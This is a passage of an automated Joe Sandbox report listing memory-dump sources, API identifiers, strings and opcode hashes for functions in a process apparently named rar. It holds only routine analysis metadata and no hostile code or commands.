                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                                                                    • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                                                                    • API String ID: 2965465231-221484280
                                                                                                                                                                                                                                                                    • Opcode ID: b199f656fb998f4aed2fd933245750af83dd83ab7653c891da19bc8afc849106
                                                                                                                                                                                                                                                                    • Instruction ID: 1ad92a32f4fe1c39db6964e254bb2fbfc5fa115af2b0c55ebe903cee440c9a42
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b199f656fb998f4aed2fd933245750af83dd83ab7653c891da19bc8afc849106
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F17922B09A8696EB30DB12E0802BE63A1FB85F84F44057ADB4DC7795DFBCE955C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                    • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                                                    • Instruction ID: 9bf1496ffac0db2c0a96d59c83cf1abfb229e142c61b9e2a373f508d2bbb15ac
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F317132608B8186DB70CF24E8442AE37A0FB84B58F501235EA8D87B99DF3CC949CB04
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3398352648-0
                                                                                                                                                                                                                                                                    • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                                                    • Instruction ID: e19141b9aaa571153fb49d42c091563ec8404a4da38641032627507d05835ad0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01116032618B4182E7608F21E44057A77F0FB88F90F445135EA8E87668DF3CD849CB84
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3116915952-0
                                                                                                                                                                                                                                                                    • Opcode ID: eaab0fd040a4371224447bd4a61fc97a754661c77a8ad9fdefb0a511b6022e5f
                                                                                                                                                                                                                                                                    • Instruction ID: b297422d1c3c08b7add21220dff734ca154d6b13b0aef06fda26f4a59152adcc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaab0fd040a4371224447bd4a61fc97a754661c77a8ad9fdefb0a511b6022e5f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22E16D23A48A82D2EB30EB25D4905F923F1FB85B84F4550B6DE4DCB796DE78E905C700
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: CMT
                                                                                                                                                                                                                                                                    • API String ID: 0-2756464174
                                                                                                                                                                                                                                                                    • Opcode ID: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
                                                                                                                                                                                                                                                                    • Instruction ID: 6a4a9a3ceb76e740ff5e72941b56cedcab19ad97349cfa1692f442ff53a625a6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FD1BC63A18A82D1EA30EB22D4501BD63F0FB85F80F4555BADA9ED76D6DE3CE945C300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D38704
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D34E3C: GetCurrentProcess.KERNEL32(00007FF695D39CC5), ref: 00007FF695D34E69
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                                                                                                    • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                                                    • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                                                    • Instruction ID: f9ece348bda7b159cbebe7936d77466759e9b32dcf38a5a25c97d25ce04dea9e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2051F062F16A9685EF20CFA2A8004A867E5FB48FDCB445631DE0D97B85DE3CD9498308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                                                                                                                    • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                                                    • Instruction ID: 8f394d1f7edbe6b5c5a5035e978fda5b337dcf0d4e0e98672d2e50d483860797
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A114C72B146018EEB208FB5E4912AE77B0FB48B48F40563ADA8D97B58DF3CC548CB44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                                                    • Instruction ID: 817a0457266a3657c127fa63e76a11e2aab63c4f22da8702702df9965a120884
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF0893270C791C3E3208F16B44412AA7E4FB85FD4F048174EA8997B58DF7CC9558704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1705453755-0
                                                                                                                                                                                                                                                                    • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                                                    • Instruction ID: df9881ad3cffcdef2ec582a997222d1e6f692de4457b735fc5e1aeed274b2893
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101402262868187EB70DB15E4513EA73E0FB84B45F805175E68CC6688DF7CDA09CF44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                                    • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                                                    • Instruction ID: 3d0e749830c0e11538370a3d644d1553a4dae4e796f40be3aefb9c77eb449f46
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741CF32B09B4589EB24CF64E8517E933E4EB04B88F015276EE4C83B94DE3CD929C348
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1039280553-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                                                    • Instruction ID: c2fccb6c60c790acaecf5e532328d7ab731a231220ee399101948950d0cf7b5c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B218026A1864287EA209F25A80813967A1FB89FA0F141274EE4A577B5DE3CEC4AC744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
